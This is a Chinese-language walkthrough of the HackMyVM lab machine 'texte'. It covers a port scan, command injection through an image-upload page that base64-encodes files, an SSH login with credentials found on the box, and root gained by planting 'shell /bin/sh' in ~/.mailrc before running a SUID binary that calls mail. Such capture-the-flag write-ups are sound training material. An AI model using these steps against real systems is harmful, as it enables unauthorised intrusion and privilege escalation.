hack-my-vm-texte

hack-my-vm-texte

端口探测

1
2
3
4
5
6
7
8
9
10
11
12
kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.134.244                                [18:49:09]
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-24 18:49 CST
Nmap scan report for 192.168.134.244
Host is up (0.023s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:DC:5B:8E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.01 seconds

端口渗透

80端口就是常规的文件上传,这里尝试了很多,无法上传php文件,我们换了一个思路,上传张图片先看看

1

可以上传,但是和常规的不太一样,这里直接展示了图片,而且base64过,结合lunix系统,我们猜测就是执行了base64命令

2

果然是命令的拼接问题,这里反弹shell一直执行失败,也无法尝试写入php文件,因为我们权限很低,是要root才能写入的,所以我们查看上面给出的最奇怪的文件

3

不像加密值,倒是很想用户名和密码,我们直接登录,就上去了

提权

1
2
kamila@texte:~$ sudo -l
-bash: sudo: command not found

sudo没有,先跑一个脚本

1
2
3
4
5
6
7
8
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strace Not Found
-rwsr-sr-x 1 root kamila 16K Oct 8 2021 /opt/texte (Unknown SUID binary!)
-rwsr-xr-- 1 root messagebus 50K Feb 21 2021 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 522K Mar 13 2021 /usr/lib/openssh/ssh-keysign

这个/opt/texte肯定有问题的,我们先执行一下

1
2
3
4
5
6
7
kamila@texte:/opt$ ./texte 
Cc: asdasd
asda

(Interrupt -- one more to kill letter)

kamila@texte:/opt$

没看懂,发现有r权限,传回来逆向一下

1
2
3
4
5
kamila@texte:/opt$ ls -la
total 24
drwxr-xr-x 2 root root 4096 Oct 8 2021 .
drwxr-xr-x 18 root root 4096 Oct 8 2021 ..
-rwsr-sr-x 1 root kamila 15560 Oct 8 2021 texte

4

主要是执行了一个mail命令,想了很多,劫持啊啥的,最后都不行,在man手册里面找到了东西

5

6

可以包含任何有效的shell结构

1
2
3
4
5
kamila@texte:~$ echo "shell /bin/sh" > .mailrc
kamila@texte:~$ /opt/texte
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(kamila)
#